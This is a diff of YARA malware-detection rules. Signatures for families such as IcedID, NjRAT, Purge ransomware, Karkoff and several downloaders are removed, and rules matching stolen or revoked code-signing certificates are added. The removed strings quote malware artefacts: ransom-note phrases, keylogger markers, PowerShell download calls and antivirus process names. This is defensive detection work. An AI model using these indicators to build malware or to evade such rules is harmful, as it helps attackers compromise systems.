-		description = "Detects executables using BlackMoon RunTime"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "76071d36-3d2d-589c-8c3f-0ae60e69996e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5146-L5155"
+		id = "23f5047d-b8f9-5f17-9add-6e29dce9a976"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7966-L7979"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "05bfde8ec3a469df5707c195e25995ac6af730e8a1595b1a598276c024420be2"
+		logic_hash = "5942c0196d7264783590c599ccfb0fe6518b338238ddb3df4e4f8999922ce86b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "blackmoon" fullword ascii
-		$s2 = "BlackMoon RunTime Error:" fullword ascii
+		thumbprint = "ef10480ab6448e60bdc689fc54cb6cfc4a8e1d39ddc788ce3d060ab4b7d30b59"
+		reason = "Ryuk"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PET PLUS PTY LTD" and pe.signatures [ i ] . serial == "01:cf:0b:0f:01:b2:0b:70:bf:aa:69:72:29:79:ef:5c" )
 }
-rule DITEKSHEN_MALWARE_Win_Iceid : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_698Ff388Adb50B88Afb832E76B0A0Ad1 : FILE
 {
 	meta:
-		description = "Detects IceID / Bokbot variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0da94737-0f82-5892-a0eb-f9f3c0a114cc"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5157-L5176"
+		id = "8118e0ee-6214-54f3-b025-234f9e685832"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7981-L7994"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "204b4c297806a36ca14bb3e659824f4eb49b18308af7090f0db1194705f1e2c9"
+		logic_hash = "7734256201739dece5ae039d45ed79c74be6228f7da51fc82c0cfd2d4aacfd4b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$n1 = "POST" fullword wide
-		$n2 = "; _gat=" fullword wide
-		$n3 = "; _ga=" fullword wide
-		$n4 = "; _u=" fullword wide
-		$n5 = "; __io=" fullword wide
-		$n6 = "; _gid=" fullword wide
-		$n7 = "Cookie: __gads=" fullword wide
-		$s1 = "c:\\ProgramData" ascii
-		$s2 = "loader_dll_64.dll" fullword ascii
-		$s3 = "loader_dll_32.dll" fullword ascii
-		$s4 = "/?id=%0.2X%0.8X%0.8X%s" ascii
-		$s5 = "%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.8X" ascii
+		thumbprint = "479e01dde7e7529ed4ad111a2d7b3b16fdc6fbe2ed0d6ff015c1c823ca0939db"
+		reason = "IcedID"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $n* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $n* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BELLAP LIMITED" and pe.signatures [ i ] . serial == "69:8f:f3:88:ad:b5:0b:88:af:b8:32:e7:6b:0a:0a:d1" )
 }
-rule DITEKSHEN_MALWARE_Win_Purge : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5143Cf38D5Fd26858830826632Be9Fda : FILE
 {
 	meta:
-		description = "Detects Purge ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b3fb9f38-ce12-5e0e-8908-3379b5da3497"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5178-L5201"
+		id = "653a969a-9aed-5a26-9962-92bc173ddfdd"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7996-L8009"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "83d13eca69bc99539e47d6d29689edf2a4fcd2260c6e909582126a490eef8115"
+		logic_hash = "b6f33fd94f8098ca9d4fe98b3dc0a833f0be78fe854c62d715b98a2ba980b8ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$n1 = "imagesave/imagesize.php" ascii
-		$n2 = "imageinfo.html" ascii
-		$n3 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" ascii
-		$n4 = "Content-Type: application/x-www-form-urlencoded" ascii
-		$m1 = "YOUR_ID: %x%x" wide
-		$m2 = "Specially for your PC was generated personal" wide
-		$m3 = "which is on our Secret Server" wide
-		$m4 = "wait for a miracle and get your price" wide
-		$s1 = "%s\\SpyHunter Remove Ransomware" wide
-		$s2 = "$recycle.bin" fullword wide
-		$s3 = "TheEnd" fullword wide
-		$s4 = "%s\\HELP_DECRYPT_YOUR_FILES.TXT" fullword wide
-		$s5 = "%s.id_%x%x_email_" wide
-		$s6 = "scmd" fullword wide
-		$s7 = "process call create \"%s\"" wide
-		$s8 = "FinishEnds" fullword ascii
+		thumbprint = "57a8aa854f3198f069bb34bc763b7773a8cfdafb562ee0ccf24a5067d45d5e3c"
+		reason = "BumbleBee"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $n* ) or 2 of ( $m* ) or ( 3 of ( $s* ) and ( 1 of ( $n* ) or 1 of ( $m* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIGI CORP MEDIA LLC" and pe.signatures [ i ] . serial == "51:43:cf:38:d5:fd:26:85:88:30:82:66:32:be:9f:da" )
 }
-rule DITEKSHEN_MALWARE_Win_Njrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3628B93Bcd902B6B3E1Ffdf2E13Dfcf5 : FILE
 {
 	meta:
-		description = "Detects NjRAT / Bladabindi / NjRAT Golden"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "078dea64-8f95-5939-a1fb-c0a888adcf0d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5203-L5220"
+		id = "8b8fa36d-181b-57a1-853e-ab11a5127fd7"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8011-L8024"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "92d535a7c7f361b7a0901d0b99427ebc82a69577bfea73c04a7f9d51d2054b36"
+		logic_hash = "bf9b2ab7a379437daa04565fdf7adc04db2f6f1a6284d1fd91f037b255523c42"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = /Njrat\s\d+\.\d+\sGolden\s/ wide
-		$s1 = /\sfirewall\s(add|delete)\sallowedprogram/ wide
-		$s2 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 (63|6b) 00 20 00 70 00 69 00 6e 00 67 }
-		$s3 = "Execute ERROR" wide
-		$s4 = "Download ERROR" wide
-		$s5 = "[kl]" fullword wide
-		$s6 = "UploadValues" fullword wide
-		$s7 = "winmgmts:\\\\.\\root\\SecurityCenter2" fullword wide
-		$s8 = "HideM" fullword wide
-		$s9 = "No Antivirus" fullword wide
+		thumbprint = "27b75dc1d31a581f6e02bba3c03a62174ee4456021c7de50922caa10b98f8f7a"
+		reason = "Malware"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "36:28:b9:3b:cd:90:2b:6b:3e:1f:fd:f2:e1:3d:fc:f5" )
 }
-rule DITEKSHEN_MALWARE_Win_Darktrackrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : FILE
 {
 	meta:
-		description = "Detects OzoneRAT / DarkTrack / DarkSky"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ef8675f8-f643-5948-a967-e4a9ce5ab89e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5222-L5245"
+		id = "f0baf7ea-7022-5834-a46c-b67bfbe706d0"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8026-L8039"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2a831c0f7707864d8c9e9fa338085a52933869d8cfbdbe0d12715da301c12646"
+		logic_hash = "438667b55f23b689627fc1e5bce0e53b960ef51d1a7d3203e398c59bd94ffe93"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Klog.dat" ascii
-		$x2 = "I_AM_DT" ascii
-		$x3 = " Alien" ascii
-		$x4 = "Local Victim" ascii
-		$x5 = "Dtback\\AlienEdition\\Server\\SuperObject.pas" ascii
-		$x6 = "].encryptedUsername" ascii
-		$x7 = "].encryptedPassword" ascii
-		$x8 = { 49 41 4d [6] 44 41 52 [0-2] 4b [6] 44 54 41 43 4b }
-		$s1 = "AntiVirusProduct" ascii
-		$s2 = "AntiSpywareProduct" ascii
-		$s3 = "ConnectServer" ascii
-		$s4 = "ExecQuery" ascii
-		$s5 = "\\Drivers\\Etc\\Hosts" fullword ascii
-		$s6 = "BTMemoryLoadLibary: Get DLLEntyPoint" ascii
-		$s7 = "\\\\.\\SyserDbgMsg" fullword ascii
-		$s8 = "\\\\.\\SyserBoot" fullword ascii
+		thumbprint = "f7a578c93fd98ade3d259ac47f152d8c9115bc5df7e2f57d107a66db3f833f0f"
+		reason = "NetSupport RAT"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pak El AB" and pe.signatures [ i ] . serial == "a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" )
 }
-rule DITEKSHEN_MALWARE_Win_Godzilla : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_17Ccecc181Ed65A357Edf3B01Df62Cc9 : FILE
 {
 	meta:
-		description = "Detects Godzilla loader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3384b844-6abf-5f94-a62b-7ebbdfe321bd"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5247-L5265"
+		id = "b692d8dd-e7c9-53cb-8c65-0001c2af3f6f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8041-L8054"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ff87fbaaf488ac69e06a03a7f8e5305ec114caa6271c25fa130033f50f0d9095"
+		logic_hash = "d79968633717744ab9e9006f8d958c1e240a1e0f99fd0b4c603d42bb7cd4773c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "MSVBVM60.DLL" fullword ascii
-		$x2 = "Loginserver8" fullword ascii
-		$x3 = "Proflogger7" fullword ascii
-		$s1 = "Badgeless5" fullword ascii
-		$s2 = "Montebrasite3" fullword ascii
-		$s3 = "Atelomyelia4" fullword ascii
-		$s4 = "Xxencoded5" fullword ascii
-		$s5 = "Garneau2" fullword ascii
-		$s6 = "Hypostasis0" fullword ascii
-		$s7 = "Piarhemia4" fullword ascii
-		$s8 = "Foredestine8" fullword ascii
+		thumbprint = "b64bd77a58c90f76afd6c4ce0b38c54c3c6088b818d0b83e5435d89e3dc01cda"
+		reason = "RedLineStealer"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $x* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "17:cc:ec:c1:81:ed:65:a3:57:ed:f3:b0:1d:f6:2c:c9" )
 }
-rule DITEKSHEN_MALWARE_Win_UNK03 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_332Bd5801E8415585E72C87E0E2Ec71D : FILE
 {
 	meta:
-		description = "Detects unknown malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b0711427-b6bf-5e4b-af36-9c752ead4d6c"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5267-L5280"
+		id = "a4e1560f-12e4-5f49-a714-7df939dad513"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8056-L8069"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f1a4be68206628c3addbce8b6bbc1f801e67632d4e6a6af1d45cdad833e9a991"
+		logic_hash = "ad3b1aebedd1ecef9af96da991cdbaca8033e0d48b5e7b776dd3fd3c4024928e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion" ascii
-		$s2 = "rundll32.exe C:\\Windows\\System32\\shimgvw.dll,ImageView_Fullscreen %s" ascii
-		$s3 = "%s.jpg" ascii
-		$s4 = "%s\\sz.txt" ascii
-		$s5 = "ChromeSecsv9867%d7.exe" ascii
-		$s6 = "%s\\appl%c.jpg" ascii
+		thumbprint = "47338c1a0ea425c47dede188d10ca95288514f369fe8a5105752bd8d906b8cbc"
+		reason = "NetSupport"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Marketing Strategies, Inc." and pe.signatures [ i ] . serial == "33:2b:d5:80:1e:84:15:58:5e:72:c8:7e:0e:2e:c7:1d" )
 }
-rule DITEKSHEN_MALWARE_Win_UNK04 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0139Dde119Bb320Dfb9F5Defe3F71245 : FILE
 {
 	meta:
-		description = "Detects unknown malware (proxy tool)"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6a178f37-a9fd-5a83-a550-c6333342ac9b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5282-L5296"
+		id = "4962ea0c-ce99-57d3-8848-48dcaab4f346"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8071-L8084"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ba6e5bbc1d094b23e3870af963503d1ccbcd56adc24126b4a38b77d4b88b4b67"
+		logic_hash = "b2a7154d73eb9271a181d71d65c73e399bb2f7d1fe031240e94b6ef4c4f7cb18"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "127.0.0.1/%d" fullword ascii
-		$x2 = "SYSTEM\\CurrentControlSet\\SERVICES\\PORTPROXY\\V4TOV4\\TCP" fullword ascii
-		$x3 = "%s rundll32.exe" fullword ascii
-		$s1 = "kxetray.exe" fullword ascii
-		$s2 = "ksafe.exe" fullword ascii
-		$s3 = "Mcshield.exe" fullword ascii
-		$s4 = "Miner.exe" fullword ascii
+		thumbprint = "23d13a8e48a6eff191a5d6a0635b99467c2e7242ae520479cae130fbd41cc645"
+		reason = "RedLineStealer"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $x* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hangil IT Co., Ltd" and pe.signatures [ i ] . serial == "01:39:dd:e1:19:bb:32:0d:fb:9f:5d:ef:e3:f7:12:45" )
 }
-rule DITEKSHEN_MALWARE_Win_Karkoff : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : FILE
 {
 	meta:
-		description = "Detects Karkoff"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7d2fe783-18b3-5d84-a9b5-e8e0b5a0db98"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5298-L5313"
+		id = "a905ee22-94c6-5d16-a9a4-a1c1528e4ac2"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8086-L8099"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e9b6ba5be2b3cd0faa898347e57cee5a57b80b19842c3a1ddb42d620307c8b39"
+		logic_hash = "94a5721bd3089f46699a947afcd03287712f94754666809e6495b01fc9cd6dcf"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "C:\\Windows\\Temp\\MSEx_log.txt" fullword wide
-		$x2 = "CMD.exe" fullword wide
-		$x3 = "Karkoff.ProjectInstaller.resources" fullword ascii
-		$s1 = /try\shttp(s)?\s(ip|domain)/ fullword wide
-		$s2 = "Reg cleaned!" fullword wide nocase
-		$s3 = "Content-Disposition: form-data; name=\"{1}\"" fullword wide
-		$s4 = "^[A-Fa-f0-9]{8}-([A-Fa-f0-9]{4}-){3}[A-Fa-f0-9]{12}$" fullword wide
-		$s5 = "new backdoor" fullword wide
+		thumbprint = "f13e4801e13898e839183e3305e1dda7f4c0ebf6eaf7553e18c1ddd4edc94470"
+		reason = "Gozi"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 4 of ( $s* ) or ( 2 of ( $x* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and pe.signatures [ i ] . serial == "2f:96:a8:9b:fe:c6:e4:4d:d2:24:e8:fd:7e:72:d9:bb" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent09 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_626735Ed30E50E3E0553986D806Bfc54 : FILE
 {
 	meta:
-		description = "Detects known downloader agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "90f71ac7-19d9-5a8e-9830-df2f16e12c9b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5315-L5328"
+		id = "5cab852e-8483-5c38-a396-3a53cf64450a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8101-L8114"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9336507fa4bb9d3a6325d5e9caafc8c4e816a0166fded7d4e53e09a87628bc89"
+		logic_hash = "960005fe1a28ddb50261aeaaa850a2410ac03ee9709af2a75485313676c92c53"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$h1 = "//:ptth" ascii wide nocase
-		$h2 = "//:sptth" ascii wide nocase
-		$s1 = "DownloadString" fullword ascii wide
-		$s2 = "StrReverse" fullword ascii wide
-		$s3 = "FromBase64String" fullword ascii wide
-		$s4 = "WebClient" fullword ascii wide
+		thumbprint = "a1488004ec967faf6c66f55440bbde0de47065490f7c758f3ca1315bb0ef3b97"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $h* ) and all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FISH ACCOUNTING & TRANSLATING LIMITED" and pe.signatures [ i ] . serial == "62:67:35:ed:30:e5:0e:3e:05:53:98:6d:80:6b:fc:54" )
 }
-rule DITEKSHEN_MALWARE_Win_Coinminingbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4A2E337Fff23E5B2A1321Ffde56D1759 : FILE
 {
 	meta:
-		description = "Detects coinmining bot"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "df15bfbd-f531-5eaa-b160-ad8a1fbe992f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5330-L5343"
+		id = "60d218b2-5297-59e6-9370-fc0ba036c688"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8116-L8129"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a307a6c9184e8f4068cfa89a8432ae017c8aab10b706ba065051f8749860c15c"
+		logic_hash = "524048d39de89002efbb8bf75135551b300e03f1126e5e117a4682c79ec04c9a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "FullScreenDetect" fullword ascii
-		$s2 = "GetChildProcesses" fullword ascii
-		$s3 = "HideBotPath" fullword ascii
-		$s4 = "Inject" fullword ascii
-		$s5 = "DownloadFile" fullword ascii
-		$s6 = "/Data/GetUpdateInfo" wide
+		thumbprint = "67099e0c41c102535d388fab1de576433f2ded2b08fb7da1bf66e3bdaba4eeb4"
+		reason = "IcedID"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Karolina Klimowska" and pe.signatures [ i ] . serial == "4a:2e:33:7f:ff:23:e5:b2:a1:32:1f:fd:e5:6d:17:59" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Fyanti : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_967Cb0898680D1C174B2Baae5Fa332Db : FILE
 {
 	meta:
-		description = "Hunt for FYAnti third-stage loader DLLs"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7a1f913c-d83f-50e9-943c-246c4c71c654"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5345-L5351"
+		id = "a95f7912-89fc-5c80-96ab-19e6ee2ccafd"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8131-L8144"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "baaeef0b1452d7ea41ffaaff592cac2c5e16f921dbbfb3a300a63e69f134e9d0"
+		logic_hash = "8c68127b29d1a1aa4c1e2033c809fa57466f224c2bb4ede0ffb2b572a3d58c0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "c231f1e6cc3aec983d892e1bc3bb1815335fb24e3e2f611d79bade9a07cbd819"
+		reason = "Babadeda"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.exports ( "FuckYouAnti" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "James Caulfield" and pe.signatures [ i ] . serial == "96:7c:b0:89:86:80:d1:c1:74:b2:ba:ae:5f:a3:32:db" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent10 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_890570B6B0E2868A53Be3F8F904A88Ee : FILE
 {
 	meta:
-		description = "Detects known downloader agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b5807adf-9d15-5e08-97fb-a529acb1c1eb"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5353-L5364"
+		id = "8d619117-00cb-5276-87c1-3f6cd701218d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8146-L8159"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "74647b39331727000608bc89b30189d802e62d59876659d4477deb4da2fcfe13"
+		logic_hash = "952b211cc2c7988b9a09ca5a96c44fea24bbaced28a79ab0ae6732675fda7365"
 		score = 75
-		quality = 67
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "powershell.exe" ascii wide nocase
-		$s2 = ".DownloadFile(" ascii wide nocase
-		$s3 = "_UseShellExecute" ascii wide nocase
-		$s4 = "_CreateNoWindow" ascii wide nocase
+		thumbprint = "f291d21d72dcefc369526a97b7d39214544b22057757ac00907ab4ff3baa2edd"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
